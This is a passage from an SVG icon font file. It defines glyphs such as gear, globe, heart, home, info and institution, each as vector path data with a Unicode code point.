19-10l24-75c3-8 2-21-3-28z" />
<glyph glyph-name="gear-alt" horiz-adv-x="1000" unicode="&#xef39;" d="M799 474c-5 11 4 30 24 51l48 48c7 7 10 15 8 17l-5 5-129 129-5 5s-10-1-17-8l-49-48c-22-22-37-26-44-26-5 0-9 2-12 6-5 4-13 17-13 49v0c0 1 0 9 0 19v49c0 10-8 18-18 18h-174c-10 0-18-8-18-18v-69c0-12-2-54-26-54-6 0-21 4-43 26l-51 51-5 5s-7 2-10 0l-133-134-5-5s-3-7 0-10l5-5 50-51c20-20 29-38 25-50-5-12-25-19-53-19h-69c-10 0-18-8-18-18v-174c0-10 8-18 18-18h69c28 0 48-7 52-19 5-11-4-30-24-50l-51-51-5-5s-2-7 0-10l134-134 5-5s7-2 10 0l5 5 51 51c22 22 37 26 43 26 24 0 26-42 26-54v-69c0-10 8-18 18-18h174c10 0 18 8 18 18v49c0 10 0 18 0 19v1c0 31 8 44 13 49 3 3 7 5 13 5 6 0 21-3 43-26l51-51 5-5s8-2 10 0l134 134 5 5s2 7 0 10l-56 56c-20 20-29 39-24 50s24 19 53 19h68c10 0 18 8 18 18v174c0 10-8 18-18 18h-68c-29 0-49 7-53 19z m-101-124c0-109-89-198-198-198s-198 89-198 198 89 198 198 198 198-89 198-198z" />
<glyph glyph-name="gear" horiz-adv-x="1000" unicode="&#xef3a;" d="M937 442c-23-14-45-26-67-39-11-6-22-12-32-19-3-2-6-6-6-10-1-16 0-31-1-46 0-7 2-10 7-13 30-16 59-33 88-50 3-2 6-4 12-7-10-26-18-52-28-77-1-3-6-6-9-6-33 3-66 6-98 10-11 1-19 0-25-10-6-12-15-22-23-32-4-4-5-8-2-14 15-34 30-67 45-103-23-16-47-32-70-48-2-1-8 1-10 2-26 23-53 45-79 68-5 4-8 5-15 3-14-5-28-10-43-13-7-2-10-5-11-12-8-36-16-71-24-107h-92c-8 36-17 71-24 106-2 8-5 11-12 13-14 3-28 8-42 13-7 2-10 2-15-3-26-22-53-45-79-67-3-2-8-4-10-2-24 15-47 31-71 47 16 35 30 68 45 100 4 8 3 13-2 19-9 11-18 22-25 33-4 6-8 8-15 7-33-3-67-6-100-10-8 0-13 0-16 9-8 25-17 49-25 74 4 3 7 5 11 7 29 17 58 33 87 50 6 3 8 6 8 13-1 15-1 30 0 44 0 7-2 10-8 14-29 16-59 33-88 50-3 2-6 3-11 6 10 26 19 53 29 79 0 2 6 4 9 4 33-3 65-6 98-9 11-2 18 0 24 10 6 11 15 21 23 31 4 5 5 9 2 15-15 33-30 67-46 102 24 16 47 32 71 48 2 1 8 0 10-2 27-23 53-45 79-68 5-4 9-5 15-3 14 6 29 10 43 14 6 2 9 4 11 11 8 35 16 70 24 107h92c8-36 16-71 24-106 1-7 4-10 11-12 15-4 29-8 43-14 6-2 10-1 15 3l78 68c4 3 8 5 13 1 22-15 45-31 68-47-11-25-21-48-32-71-4-11-9-22-14-32-3-5-1-9 2-13 9-12 19-24 27-37 4-5 8-7 14-6 34 3 67 6 100 10 9 1 14 0 17-9 8-25 17-49 25-74z m-291-96c2 77-62 144-139 146-84 2-150-58-152-139-3-76 61-142 138-144 83-3 150 58 153 137z" />
<glyph glyph-name="gears" horiz-adv-x="1000" unicode="&#xef3b;" d="M578 201c-4 2-5 5-5 9 0 10 0 20 0 31 0 2 2 5 4 7 7 4 14 8 21 12 15 9 29 17 45 26-6 17-11 33-17 50-2 6-5 6-11 6-22-3-44-5-66-7-4 0-7 1-9 4-6 9-12 17-19 25-2 3-3 5-1 8 4 7 7 14 10 22 7 15 14 31 21 47-15 11-31 21-45 32-4 2-6 1-9-1-17-15-35-30-52-46-3-2-6-3-9-1-10 3-19 6-29 9-5 1-7 3-8 8-5 23-10 47-16 71h-60c-6-25-11-48-17-72 0-4-3-6-7-7-9-3-19-6-28-9-5-2-7-1-10 2-18 15-35 30-53 45-1 1-5 2-7 1-15-10-31-21-46-32 10-23 20-46 30-68 2-4 2-7-1-10-6-7-11-13-15-20-4-7-9-8-16-8-22 3-44 5-66 7-2 0-5-1-6-3-6-17-12-35-18-53 3-2 5-3 7-4 19-11 39-22 58-33 4-2 5-5 5-9 0-10 0-20 0-30 0-4-1-7-5-9-19-11-39-22-58-33-2-1-4-3-7-5 6-16 11-33 17-49 2-6 5-6 10-6l67 7c4 0 7-1 10-5 5-7 10-15 16-22 4-4 4-8 2-13-10-21-20-43-30-66 16-11 31-22 47-32 1-1 5 0 7 1 17 15 35 30 52 45 3 3 6 4 10 2 9-3 18-6 28-9 4-1 7-3 8-8 5-24 10-47 16-71h60c6 24 11 48 17 71 1 5 2 7 7 8 10 3 19 6 29 9 4 2 6 1 10-2 17-15 34-30 52-45 1-1 5-2 6-1 16 10 32 21 47 32-10 23-20 46-30 68-2 4-1 7 1 10 6 7 12 13 16 21 4 7 9 7 16 7 22-3 43-5 65-7 2 0 6 2 6 4 7 17 13 34 19 52-4 2-6 3-8 4-20 11-39 22-58 33z m-230-71c-51 2-93 46-92 97 2 54 46 94 102 92 51-1 93-45 92-97-2-53-47-93-102-92z m349 304c3-15 7-30 10-46h40c3 16 7 31 10 47 1 3 2 4 5 5 6 1 13 3 19 6 3 1 4 0 6-2 12-10 23-19 34-29 1-1 4-1 5-1 10 7 20 14 30 21-7 15-13 30-20 44-1 3-1 5 1 7 4 4 8 8 10 13 3 5 6 5 11 5 14-2 28-3 42-4 2 0 4 1 4 2 4 11 8 23 12 34-2 1-3 2-5 3-12 7-25 14-38 22-2 1-3 2-3 5 1 7 0 14 1 20 0 2 1 4 2 5 5 3 9 5 14 8 10 5 19 11 29 17-3 11-7 21-11 32-1 4-3 4-7 4-14-2-29-3-43-4-3-1-5 0-6 2-4 6-8 11-12 16-2 2-2 4-1 6 2 4 4 9 6 14 5 10 9 20 14 31-10 7-20 14-29 20-3 2-4 1-6 0l-34-30c-2-2-4-2-6-1-6 2-12 4-19 6-3 1-4 2-5 5-3 16-7 31-10 47h-40c-3-16-7-32-10-47-1-3-2-4-5-5-6-1-12-3-19-6-2-1-4 0-6 2-11 9-23 19-34 29-1 1-4 1-5 1-10-7-20-14-30-21 7-15 13-30 20-44 1-3 1-5-1-7-4-4-8-8-10-13-3-5-6-6-11-5-14 2-28 3-42 4-1 0-4-1-4-2-4-11-8-22-12-34 2-1 3-2 4-3 13-7 26-14 39-21 2-2 3-3 3-6-1-7-1-13 0-20 0-2-1-4-3-5-13-7-26-15-38-22-2-1-3-2-5-3 4-11 8-22 11-32 1-4 3-4 7-4 14 2 29 3 43 4 3 1 5 0 7-3 3-5 6-10 10-14 3-3 3-5 1-9-6-14-12-28-19-43 10-7 20-14 30-21 1 0 4 0 5 1 11 10 23 20 34 29 2 2 4 3 6 2 6-3 13-5 19-6 3-1 4-2 5-6z m-33 143c1 35 30 61 66 60 34 0 61-29 60-63-1-34-30-61-66-60-33 1-61 30-60 63z m270-389c-9 5-17 10-26 15-2 1-3 2-2 4 0 5-1 10 0 14 0 1 1 3 1 3 4 3 7 4 10 6 7 4 13 8 20 12-2 8-5 15-7 22-1 3-3 3-5 3-10-1-20-2-30-3-2 0-3 0-5 2-2 4-5 8-8 11-1 1-1 3 0 4 1 3 3 7 4 10 3 7 6 14 10 22-7 4-14 9-21 14-2 1-3 0-4-1l-24-20c-1-2-2-2-4-1-4 2-9 3-13 4-2 1-3 2-3 4-3 10-5 21-8 32h-27c-3-11-5-22-7-33-1-2-2-2-4-3-4-1-8-2-13-4-2-1-3 0-4 1-8 7-16 14-24 20-1 1-2 1-3 1-7-5-14-10-21-14 5-11 9-21 14-31 0-2 0-4-1-5-3-3-5-6-7-9-2-4-4-4-7-4-10 2-20 2-30 3-1 0-2 0-3-1-3-8-5-16-8-24 1-1 2-1 3-2 9-5 18-10 27-15 1-1 2-2 2-4 0-5 0-9 0-13 0-2-1-4-2-4-9-5-18-10-27-16-1 0-2-1-3-2 2-7 5-15 8-22 0-3 2-3 4-3 10 1 21 2 31 3 2 1 3 0 4-2 2-3 5-7 7-10 2-2 2-3 1-6-4-9-9-19-13-30 7-5 14-10 21-14 1-1 2 0 3 0 8 7 16 14 24 21 1 1 2 1 4 1 4-2 9-3 13-5 2 0 3-1 4-3 2-11 4-22 7-33h28c2 11 5 22 7 33 0 2 1 3 3 3 5 2 9 3 13 4 2 1 3 1 5 0 8-7 16-14 23-21 1-1 3-1 3-1 8 5 15 10 22 15-5 11-10 21-14 31-1 2-1 3 0 5 3 3 6 6 8 9 1 3 4 3 7 3 10-1 20-2 29-3 1 0 3 1 3 2 3 8 6 16 9 23-2 1-3 2-4 2z m-130-17c-24 1-43 21-42 44 0 24 20 43 46 42 23-1 42-21 42-44-1-24-21-43-46-42z" />
<glyph glyph-name="gift" horiz-adv-x="1000" unicode="&#xef3c;" d="M719 608c75 0 109 37 109 82 0 45-34 82-109 82-71 0-127-32-164-68-17 9-36 15-57 15-20 0-38-5-54-14-37 36-93 67-163 67-75 0-109-37-109-82 0-45 34-82 109-82h182v-681h74v681h182z m0 109c25 0 54-4 54-27 0-22-29-27-54-27h-125l-1 2c28 27 70 52 126 52z m-317-54h-121c-25 0-55 5-55 27 0 23 30 27 55 27 55 0 96-24 124-50l-3-4z m-339-134v-109h382v164h-328c-30 0-54-25-54-55z m54-547c0-30 25-55 55-55h273v438h-328v-383z m766 602h-326v-165h381v110c0 30-25 55-55 55z m-326-657h271c30 0 55 25 55 55v383h-326v-438z" />
<glyph glyph-name="glass" horiz-adv-x="1000" unicode="&#xef3d;" d="M605-45l-18 4c-9 2-17 3-23 4-21 5-21 5-25 15-2 3-3 7-6 12-10 21-8 48-6 106 1 24 2 53 3 88v4c3 100 3 100 48 119 7 2 15 6 24 9 79 35 91 118 83 232-4 74-26 182-38 239h-294c-12-57-33-165-38-239-7-114 4-197 83-232 9-3 17-7 24-9 45-19 45-19 48-119v-4c1-35 2-64 3-88 3-58 4-85-6-106-2-5-4-9-6-12-4-10-4-10-25-15-6-1-13-2-23-4l-18-4c-44-9-55-11-59-31 0-3 1-6 3-8 2-2 4-4 8-4h307c3 0 5 2 7 4 2 2 3 5 3 8-3 20-15 22-59 31z" />
<glyph glyph-name="globe" horiz-adv-x="1000" unicode="&#xef3e;" d="M809 655c-40 39-87 70-139 92-54 23-111 34-170 34s-116-11-170-34c-52-22-99-53-139-92-41-40-72-86-94-137-23-53-34-110-34-168s11-115 34-168c22-51 54-97 94-137 40-39 87-70 139-92 54-23 111-34 170-34s116 11 171 34c52 22 98 53 139 92 40 40 71 86 93 137 23 53 35 110 35 168s-12 115-35 168c-22 51-53 97-94 137z m42-270h-94c-7 0-13 6-14 13-3 45-10 88-20 127-2 8 2 15 9 17 17 6 33 12 49 19 6 3 15 1 20-5 32-46 54-100 62-158 1-7-5-13-12-13z m-303 297c4-2 7-5 11-8 21-16 41-40 57-70 2-3 3-5 4-8 2-4-2-9-9-10-20-3-41-5-62-6-7-1-13 5-13 12v83c0 8 5 11 12 7z m-107-8c4 3 7 6 11 8 7 4 12 1 12-7v-83c0-7-6-13-13-12-21 1-42 3-62 6-7 1-12 6-9 10 1 3 2 5 4 8 16 30 36 54 57 70z m-94-165c2 7 9 11 16 10 29-5 58-8 88-10 7 0 13-6 13-14v-97c0-7-6-13-13-13h-110c-7 0-13 6-12 13 2 32 6 64 13 93 2 6 3 12 5 18z m117-208v-96c0-8-6-14-13-14-30-2-59-5-87-10-7-1-15 3-17 10-2 7-3 13-5 19-6 29-11 60-13 92-1 7 5 13 12 13h110c7 0 13-6 13-14z m0-193v-82c0-7-5-11-12-7-3 2-7 5-11 8-21 16-41 41-57 71-2 2-3 4-4 7-2 3 2 8 10 9 20 3 40 5 61 6 7 1 13-5 13-12z m95-81c-4-3-7-5-11-8-7-4-12 0-12 7v82c0 7 6 13 13 12 21-1 41-3 61-6 8-1 12-5 10-9-1-2-2-5-4-7-16-31-36-55-57-71z m94 164c-2-7-10-11-17-10-28 5-57 8-87 10-7 0-13 6-13 14v97c0 7 6 13 13 13h110c7 0 13-6 12-13-2-32-7-62-13-92-2-6-3-12-5-19z m-117 207v97c0 8 6 14 13 14 30 2 59 5 88 10 7 1 15-3 16-10 2-6 3-12 5-18 7-29 11-61 14-93 0-7-6-13-13-13h-110c-7 0-13 6-13 13z m193 218c-7-3-14-5-21-7-7-3-15 1-18 8-4 7-7 13-11 20-5 10-11 20-18 30-4 6-2 8 5 5 23-12 45-26 65-42 6-5 5-11-2-14z m-390 50c-6-9-12-19-18-29-4-7-7-13-11-20-3-7-11-11-18-8-7 2-14 4-21 7-7 3-8 9-2 14 20 16 42 30 65 42 7 3 9 1 5-6z m-119-105c15-7 31-13 48-19 7-2 11-9 9-16-10-40-17-83-20-127 0-8-7-14-14-14h-94c-7 0-13 6-12 13 8 58 30 112 63 158 4 6 13 8 20 5z m-71-246h94c7 0 14-6 14-14 3-44 10-87 21-126 2-8-3-15-10-17-17-6-33-12-48-19-7-3-16-1-21 5-32 46-54 100-62 158-1 7 5 13 12 13z m122-231c7 3 14 5 22 8 7 2 15-2 18-9 3-6 6-12 10-19 6-11 13-21 19-31 5-6 3-9-4-5-24 11-46 26-67 42-6 5-5 11 2 14z m389-51c6 9 13 20 19 31 4 7 7 13 10 19 3 7 11 11 18 9 8-3 15-5 22-8 7-3 8-9 2-14-20-16-43-31-67-43-7-3-9-1-4 6z m120 106c-15 7-31 13-48 19-8 2-12 10-10 17 11 39 18 82 21 127 0 7 7 13 14 13h94c7 0 13-6 12-13-8-58-30-112-62-158-5-6-14-8-21-5z" />
<glyph glyph-name="graffiti" horiz-adv-x="1000" unicode="&#xef3f;" d="M578 669h-21v41c-1 0-1 0-2 0-9 0-15 11-15 24 0 13 6 24 15 24 1 0 1 0 2 0v20h-120v-109h-20v-27h161v27z m84-104c4 5 7 11 7 18 0 14-11 25-25 25h-306c-14 0-26-11-26-25 0-7 3-13 8-18-14-11-23-28-23-47v-503h388v503c0 19-9 36-23 47z m-365-591c0-34 27-62 61-62h266c33 0 61 28 61 62v4h-388v-4z m337 751h57c7 0 11 2 12 9 0 6-5 9-12 9-2 0-4 0-7 0h-52c-3 0-5 0-7 1 20 9 39 17 59 26 6 2 10 6 7 12-3 7-9 6-16 4-34-14-68-29-102-43-3-2-7-6-7-9 1-3 4-7 8-9 10-5 21-9 31-13l70-30c7-2 13-3 16 4 3 6-1 10-7 12-3 1-5 3-8 4l-53 22 1 1h10z" />
<glyph glyph-name="grocery" horiz-adv-x="1000" unicode="&#xef40;" d="M796 601h-170v64c0 68-56 123-126 123-69 0-126-55-126-123v-64h-170l-31-689h654l-31 689z m-394 64c0 53 44 95 98 95s98-42 98-95v-64h-196v64z" />
<glyph glyph-name="hand" horiz-adv-x="1000" unicode="&#xef41;" d="M793 653c-27 0-50-23-50-50v-219c0-10-7-17-17-17-9 0-17 8-17 17v319c0 28-22 51-50 51-28 0-50-23-50-51v-286c0-9-8-16-17-16-10 0-17 7-17 16v320c0 28-23 51-51 51s-50-23-50-51v-320c0-9-8-16-17-16-9 0-17 7-17 16v253c0 28-22 50-50 50-28 0-50-22-50-50v-421l-69 93c-20 32-59 42-88 24-29-18-36-58-16-89 0 0 110-166 157-237 47-72 123-128 264-128 235 0 256 182 256 236v455c0 27-23 50-51 50z" />
<glyph glyph-name="hanger" horiz-adv-x="1000" unicode="&#xef42;" d="M499 117c-119 0-239 0-359 0-31 0-56 11-70 40-19 39 0 84 42 98 94 31 188 61 282 92 25 8 50 17 76 25 6 2 9 5 9 12 0 20 7 36 21 50 9 9 18 17 26 26 13 16 14 36 4 53-10 15-29 24-46 21-21-4-35-18-38-39 0-2-1-5-1-7-2-15-12-24-25-23-14 1-23 12-23 26 1 47 35 85 85 92 42 5 87-25 99-68 9-34 2-64-23-90l-21-22c-3-4-7-8-8-12-6-12-3-17 10-21l345-113c34-11 54-38 54-70-1-32-23-60-54-67-8-3-17-3-26-3-120 0-239 0-359 0z m0 49h359c4 0 8-1 11 0 11 1 17 7 19 17 3 13-3 22-20 28-118 38-236 77-355 116-9 3-17 3-26 0-78-26-157-51-235-77-41-13-82-27-122-40-14-5-21-15-18-27 2-11 11-17 27-17 120 0 240 0 360 0z" />
<glyph glyph-name="hard-disk" horiz-adv-x="1000" unicode="&#xef43;" d="M107 212c6 2 13 2 19 2h748c7 0 13 0 19-2 6-1 7 1 3 6l-49 54c-5 4-13 8-19 8h-656c-6 0-14-4-18-8l-50-54c-4-5-3-7 3-6z m-1 423c6 1 13 2 20 2h748c7 0 14-1 20-2 6-2 8 0 4 5l-120 130c-10 11-25 17-39 17h-477c-15 0-29-6-39-17l-120-130c-4-5-3-7 3-5z m768-51h-748c-19 0-35-16-35-35v-181c0-19 16-35 35-35h748c20 0 35 16 35 35v181c0 19-16 35-35 35z m-252-178c-29 0-53 23-53 52s24 53 53 53 53-23 53-53-24-52-53-52z m153 0c-29 0-53 23-53 52s24 53 53 53 53-23 53-53-23-52-53-52z m99-242h-748c-19 0-35-16-35-35v-181c0-20 16-36 35-36h748c20 0 35 16 35 36v181c0 19-16 35-35 35z m-252-179c-29 0-53 24-53 53s24 53 53 53 53-24 53-53-24-53-53-53z m153 0c-29 0-53 24-53 53s24 53 53 53 53-24 53-53-23-53-53-53z" />
<glyph glyph-name="heart-alt" horiz-adv-x="1000" unicode="&#xef44;" d="M495-109c-13 17-24 35-37 51-41 51-90 94-138 137-57 52-114 102-169 156-56 56-103 120-129 197-22 62-30 125-13 190 25 99 110 175 211 190 116 18 224-40 276-145 0-2 1-3 2-4 1-3 2-3 4-2 0 1 1 2 1 3 39 79 100 129 187 146 81 17 154-2 217-55 71-61 100-139 92-231-8-87-44-161-97-229-50-64-109-117-169-170-54-49-108-98-160-149-27-25-50-56-68-88-1-1-1-2-2-3-1-2-5 1-8 6z" />
<glyph glyph-name="heart" horiz-adv-x="1000" unicode="&#xef45;" d="M500 595c16 28 36 52 60 72 90 73 230 66 311-17 64-66 80-145 55-232-19-68-56-126-100-180-73-87-160-155-255-215-21-13-43-26-64-38-3-2-9-3-12-1-109 62-211 134-296 227-52 55-94 117-119 189-21 60-25 120 1 179 34 76 94 123 177 135 104 14 185-25 240-116 0-1 1-1 2-3z" />
<glyph glyph-name="history" horiz-adv-x="1000" unicode="&#xef46;" d="M931 416c-16 99-65 181-144 241-117 89-246 109-382 56-132-51-213-150-243-288-3-16-5-31-7-48-13 14-25 27-37 40-13 14-33 15-46 4-13-13-13-31 1-46 27-30 55-59 83-89 17-19 33-19 52-2 29 27 58 54 86 81 4 3 7 7 10 11 8 12 5 29-6 38-12 10-28 11-40 0-13-11-25-22-38-34l-2 1c2 13 3 25 6 37 37 173 201 285 375 257 160-27 276-162 277-324 0-96-35-178-106-243-88-81-192-105-307-78-57 14-106 43-148 83-15 15-33 15-46 2-13-13-12-31 4-46 91-86 199-123 323-108 100 12 182 58 247 133 79 93 108 202 88 322z m-369 139c0 5-1 10-1 15-3 17-20 27-37 23-15-3-24-15-24-33 0-76 0-152 0-229 0-25 11-37 36-37 47 0 94 0 141 0 2 0 5 0 7 0 19 2 30 15 29 32-1 17-14 29-32 29-36 0-71 0-107 0h-13v14c1 62 1 124 1 186z" />
<glyph glyph-name="home" horiz-adv-x="1000" unicode="&#xef47;" d="M926 427l-96 68c1 3 1 6 1 9 0 24 0 47 0 70s0 47 0 71c0 13-4 17-17 17-31 0-62 0-92 0-13 0-17-4-17-17l0-62-190 134c-14 9-16 10-29 0l-244-171c-56-40-112-80-169-120-11-8-13-13-7-23 19-27 37-53 56-80 2-3 7-5 11-9 5 3 10 6 14 8l20 15c-1-3-1-6-1-9 0-110 0-221 0-331 0-17 4-21 21-21h208c18 0 21 3 21 21v294h168v-295c0-16 4-20 20-20h209c15 0 19 4 19 19 0 112 0 224 0 336 0 2 0 5-1 7l23-16c13-9 18-8 27 5l50 72c10 14 9 18-5 28z" />
<glyph glyph-name="horn" horiz-adv-x="1000" unicode="&#xef48;" d="M937 49l-77 670c0 4-1 8-2 12-2 6-5 9-12 8-21-4-26 2-23-28 3-35 2-70-8-103-9-33-25-62-47-87-17-20-36-37-58-49-19-11-37-22-56-31-19-9-39-17-59-24-20-7-40-13-61-17-34-8-68-17-103-22-71-11-143-21-215-30-24-3-49-3-74-2-13 1-27 6-39 10-5 1-9 7-13 11-4 4-8 9-13 10-10 3-15-2-14-13 6-57 12-113 19-170 1-4 6-10 8-10 6 0 12 3 16 7 5 6 6 15 11 20 11 11 23 17 38 21 15 3 31 8 46 11 2 1 5 1 7 1 5-9-1-15-5-21-24-43-29-88-10-135 11-27 29-48 50-66 28-23 59-38 94-47 16-4 32-7 48-10 41-7 82-4 122 5 27 6 56 13 81 29 19 12 40 22 58 36 43 36 75 80 78 141 1 24-5 47-15 68-2 5-4 10-6 15l2 3c10-3 21-5 30-8 17-7 33-14 48-23 43-23 75-58 95-105 11-27 17-55 21-84 2-17 5-19 20-17 18 2 20 4 18 24z m-294 81c-21-32-51-51-84-66-16-7-33-13-50-16-39-9-78-16-119-9-17 3-33 6-50 9-25 6-46 18-65 35-24 21-34 56-25 88 7 24 22 41 40 56 20 17 43 28 68 36 19 5 39 7 59 11l0-2c14 2 29 5 43 5 14 1 29 0 43 1 25 1 49-2 73-8 18-4 35-11 49-22 36-27 45-78 18-118z" />
<glyph glyph-name="hour-glass" horiz-adv-x="1000" unicode="&#xef49;" d="M518 470l110 98c5 5 9 12 9 20v8c0 15-12 28-27 28h-219c-15 0-28-13-28-28v-8c0-8 4-15 10-20l109-98c10-9 26-9 36 0z m274-511c-5 6-12 8-19 8-15 0-27 12-27 27v209c0 17-6 31-19 41l-95 86c-12 11-12 30 0 40l95 86c13 10 19 24 19 41v209c0 15 12 27 27 27 7 0 14 2 19 8 6 5 9 11 9 19s-3 15-9 20c-5 5-12 8-19 8h-546c-7 0-13-3-19-8-6-5-9-12-9-20s3-14 9-19c6-6 12-8 19-8 15 0 27-12 27-27v-209c0-17 6-31 19-41l95-86c12-10 12-29 0-40l-95-86c-13-10-19-24-19-41v-209c0-15-12-27-27-27-7 0-13-2-19-8s-9-11-9-19 3-15 9-20 12-8 19-8h547c8 0 14 3 19 8 5 5 8 12 8 20s-3 14-9 19z m-101 35c0-15-12-27-27-27h-328c-15 0-27 12-27 27v197c0 8 3 15 9 20l132 119c12 11 12 30 0 40l-132 119c-6 5-9 12-9 20v197c0 15 12 27 27 27h328c15 0 27-12 27-27v-197c0-8-3-15-9-20l-132-119c-12-10-12-29 0-40l132-119c6-5 9-12 9-20v-197z m-63 139l-52 46c-5 5-11 7-18 7h-116c-7 0-13-2-18-7l-52-46c-5-6-9-13-9-21v-63c0-15 12-27 28-27h218c15 0 28 12 28 27v63c0 8-4 15-9 21z" />
<glyph glyph-name="id" horiz-adv-x="1000" unicode="&#xef4a;" d="M905 591h-309v32c0 53-43 96-96 96-53 0-96-43-96-96v-32h-309c-18 0-32-14-32-32v-546c0-18 14-33 32-33h810c18 0 33 15 33 33v546c0 18-15 32-33 32z m-456 39c0 28 23 50 51 50s51-22 51-50v-37h-102v37z m446-578c0-18-15-33-33-33h-724c-18 0-33 15-33 33v468c0 18 15 33 33 33h724c18 0 33-15 33-33v-468z m-625 263c33 0 61 28 61 62s-28 61-61 61c-34 0-61-28-61-61 0-34 27-62 61-62z m0-16c-53 0-96-43-96-96v-69h192v69c0 53-43 96-96 96z m203 139h353v-39h-353v39z m0-133h353v-38h-353v38z m0-132h353v-39h-353v39z" />
<glyph glyph-name="image" horiz-adv-x="1000" unicode="&#xef4b;" d="M681 293c-13 15-31 15-43-2-6-8-12-17-18-26-11-16-30-17-43-2-27 31-54 61-80 92-13 15-33 14-46-1l-40-47c-12-15-31-19-42-10-11 10-25 10-33 0-7-9-19-6-27 8-5 8-10 17-15 25-4 7-8 11-10 9-1-1-1-2-2-4-26-49-86-156-93-155l-8-82h619c19 0 25 13 13 28l-132 167z m-81 125c52 0 92 39 92 89 1 53-39 95-90 95-52 1-95-42-94-94 1-50 41-90 92-90z m298 297h-796c-22 0-39-18-39-40v-650c0-21 17-39 39-39h797c21 0 39 18 39 39v650c0 22-18 40-40 40z m-11-644c0-22-18-39-39-39h-696c-21 0-39 17-39 39v559c0 21 18 39 39 39h696c21 0 39-18 39-39v-559z" />
<glyph glyph-name="inbox" horiz-adv-x="1000" unicode="&#xef4c;" d="M922 279c0 6-2 12-5 16-43 58-87 116-130 174-3 3-9 6-14 6-29 1-58 1-88 1l-48-47h110c7 0 12-1 16-7 32-43 64-86 97-128 1-2 1-3 3-6h-268c-3-31-14-57-39-75-18-14-39-20-62-19-37 3-83 29-88 93h-270c3 5 5 7 7 10 31 41 61 82 92 123 5 6 9 9 18 9 36 0 73 0 109 0l-47 47c-30 0-59 0-88-1-5 0-11-3-14-6-43-58-87-116-130-174-3-4-5-11-5-17-1-113-1-226-1-339 0-21 6-27 28-27h792c19 0 26 6 26 25 0 114 0 228-1 342z m-434 69c7-7 18-7 24 0l206 199c7 7 7 18 0 24l-41 40c-7 6-18 6-25 0l-97-95v255c0 9-7 17-17 17h-69c-9 0-17-8-17-17v-262l-105 102c-6 6-17 6-24 0l-41-40c-7-7-7-17 0-24l206-199z" />
<glyph glyph-name="infinite" horiz-adv-x="1000" unicode="&#xef4d;" d="M469 461c-18-25-35-48-53-71-13 14-25 28-38 41-18 20-39 36-62 49-29 15-56 9-83-3-58-26-91-87-82-149 9-61 61-111 123-117 34-4 63 12 85 36 32 35 61 73 91 110 37 46 72 94 111 138 37 43 84 71 141 77 40 4 77-5 112-24 68-38 112-94 122-172 9-79-19-146-80-197-46-39-101-57-161-49-53 7-95 33-130 72-10 11-21 23-31 34-1 3-3 8-2 10 16 22 33 44 49 66 19-21 36-42 55-61 8-9 18-16 29-23 44-29 86-20 126 8 48 35 68 84 56 142-11 57-48 92-104 107-26 7-48 2-70-12-34-22-62-50-86-81-42-54-83-108-124-161-27-34-57-64-97-82-75-37-147-25-212 23-119 86-123 259-8 351 89 72 205 68 286-21 12-14 25-27 37-41z" />
<glyph glyph-name="info-circle" horiz-adv-x="1000" unicode="&#xef4e;" d="M500 788c-242 0-437-196-437-438s195-438 437-438 438 196 438 438-196 438-438 438z m-65-167c8 1 17 3 26 3 10 1 18 1 26 1 8 0 17 0 27-1 9 0 18-2 26-3 2-8 3-17 3-25 0-8 1-16 1-24 0-8-1-16-1-25 0-8-1-16-3-25-8-1-17-2-26-2-9-1-18-1-26-1-8 0-17 0-26 1-10 0-19 1-27 2-3 17-4 34-4 50 0 15 1 32 4 49z m163-546h-196c-3 13-4 26-4 39 0 6 0 13 1 20 0 7 2 14 3 20h48v226h-48c-1 6-3 13-3 20-1 7-1 13-1 20 0 13 1 26 4 39h148v-305h48c2-6 3-13 3-20 1-7 1-14 1-20 0-13-1-26-4-39z" />
<glyph glyph-name="info-square" horiz-adv-x="1000" unicode="&#xef4f;" d="M873 787h-745c-36 0-65-28-65-64v-746c0-36 29-64 65-64h745c36 0 65 28 65 64v746c0 36-29 64-65 64z m-438-166c8 1 17 2 26 3 10 1 18 1 26 1 8 0 17 0 27-1 9-1 18-2 26-3 2-9 3-17 3-25 1-8 1-16 1-24 0-8 0-16-1-25 0-8-1-16-3-25-8-1-17-2-26-3-9 0-18 0-26 0-8 0-17 0-26 0-10 1-18 2-27 3-3 17-4 33-4 50 0 15 1 32 4 49z m163-546h-196c-3 12-4 25-4 39 0 6 0 13 1 20 0 7 2 14 3 20h48v225h-48c-1 7-3 13-3 20-1 8-1 14-1 21 0 13 1 26 4 38h148v-304h48c2-6 3-13 4-20 0-7 1-14 1-20 0-14-2-27-5-39z" />
<glyph glyph-name="info" horiz-adv-x="1000" unicode="&#xef50;" d="M661 6c-1 12-2 22-5 33h-76v484h-236c-4-20-7-41-7-62 0-10 1-21 2-32 1-11 3-22 5-32h77v-358h-77c-2-11-4-21-5-33-1-11-2-22-2-32 0-21 3-41 7-62h312c5 21 7 41 7 62 0 10 0 21-2 32z m-222 614c15-1 29-1 41-1 13 0 27 0 42 1 15 0 29 2 42 4 2 13 3 27 4 40 1 13 1 26 1 38 0 14 0 27-1 39s-2 26-4 40c-13 2-27 4-43 5-15 1-29 1-42 1-12 0-26 0-41-1-15-1-28-3-41-5-5-28-7-54-7-79 0-25 2-51 7-78 13-2 27-4 42-4z" />
<glyph glyph-name="institution" horiz-adv-x="1000" unicode="&#xef51;" d="M919 616c9 0 13 1 10 3-3 1-4 2-6 3-137 54-274 108-411 163-8 3-16 3-24 0-126-50-251-100-377-150-10-4-19-8-28-12-8-3-15-6-15-6 1-1 8-1 16-1h835z m-6-650h-826c-8 0-15-7-15-15v-23c0-9 7-15 15-15h826c9 0 16 6 16 15v23c0 8-7 15-16 15z m-791 75v-22c0-8 7-15 16-15h725c9 0 16 7 16 15v22c0 8-7 15-16 15h-725c-9 0-16-7-16-15z m321 65c8 0 15 6 15 15v342c0 8-7 15-15 15h-71c-8 0-15-7-15-15v-342c0-9 7-15 15-15h71z m370 0c9 0 16 6 16 15v342c0 8-7 15-16 15h-70c-9 0-16-7-16-15v-342c0-8 7-15 16-15l70 0z m-556 0c9 0 16 7 16 15v342c0 8-7 15-16 15h-71c-8 0-15-7-15-15v-342c0-8 7-15 15-15h71z m665 469h-843c-9 0-16-7-16-15v-12c0-9 7-15 16-15h843c9 0 16 6 16 15v12c0 8-7 15-16 15z m-294-469c8 0 15 7 15 16v341c0 8-7 15-15 15h-70c-9 0-16-7-16-15v-341c0-9 7-16 16-16l70 0z" />
